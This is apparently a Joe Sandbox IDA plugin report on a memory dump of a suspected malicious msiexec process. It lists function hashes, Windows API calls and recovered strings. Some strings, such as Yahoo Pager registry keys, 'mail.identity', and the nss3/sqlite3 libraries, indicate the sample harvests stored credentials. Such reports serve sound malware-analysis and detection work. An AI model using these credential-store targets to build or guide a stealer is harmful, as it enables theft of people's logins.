• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: _mbsicmp$??2@??3@atoistrlen
• String ID:
• API String ID: 4107816708-0
• Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
• Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
• Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
• Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
• _gmtime64.MSVCRT ref: 00411437
• memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
• strftime.MSVCRT ref: 00411476
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
• String ID:
• API String ID: 1886415126-0
• Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
• Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
• Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
• Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: strlen
• String ID: >$>$>
• API String ID: 39653677-3911187716
• Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
• Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
• Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
• Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
APIs
• memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
• memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
• memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
• Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
• Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
• Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
• Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: _strcmpi
• String ID: C@$mail.identity
• API String ID: 1439213657-721921413
• Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
• Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
• Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
• Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
APIs
• memset.MSVCRT ref: 00444573
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: QueryValuememset
• String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
• API String ID: 3363972335-1703613266
• Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
• Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
• Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
• Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
APIs
• memset.MSVCRT ref: 00406640
  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
• memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
• memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memset$memcmp
• String ID: Ul@
• API String ID: 270934217-715280498
• Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
• Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
• Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
• Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
APIs
  • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
Strings
• recovered %d pages from %s, xrefs: 004188B4
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
• String ID: recovered %d pages from %s
• API String ID: 985450955-1623757624
• Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
• Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
• Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
• Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: _ultoasprintf
• String ID: %s %s %s
• API String ID: 432394123-3850900253
• Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
• Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
• Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
• Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
APIs
• LoadMenuA.USER32(00000000), ref: 00409078
• sprintf.MSVCRT ref: 0040909B
  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
• String ID: menu_%d
• API String ID: 1129539653-2417748251
                                                                                                        • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                        • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                        • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                        • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _msizerealloc
                                                                                                        • String ID: failed memory resize %u to %u bytes
                                                                                                        • API String ID: 2713192863-2134078882
                                                                                                        • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                        • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                        • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                        • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                        • strrchr.MSVCRT ref: 00409808
                                                                                                        • _mbscat.MSVCRT ref: 0040981D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileModuleName_mbscatstrrchr
                                                                                                        • String ID: _lng.ini
                                                                                                        • API String ID: 3334749609-1948609170
                                                                                                        • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                        • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                        • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                        • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                        APIs
                                                                                                        • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                          • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                          • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                        • _mbscat.MSVCRT ref: 004070FA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscat$_mbscpystrlen
                                                                                                        • String ID: sqlite3.dll
                                                                                                        • API String ID: 1983510840-1155512374
                                                                                                        • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                        • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                        • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                        • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                        APIs
                                                                                                        • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileString
                                                                                                        • String ID: A4@$Server Details
                                                                                                        • API String ID: 1096422788-4071850762
                                                                                                        • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                        • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                        • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                        • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                        • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                        • memset.MSVCRT ref: 0042C932
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 438689982-0
                                                                                                        • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                        • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                        • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                        • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                        APIs
                                                                                                        • strlen.MSVCRT ref: 0040849A
                                                                                                        • memset.MSVCRT ref: 004084D2
                                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,67CB7B60,?,00000000), ref: 0040858F
                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,67CB7B60,?,00000000), ref: 004085BA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3110682361-0
                                                                                                        • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                        • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                        • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                        • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                        • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3510742995-0
                                                                                                        • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                        • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                        • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                        • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8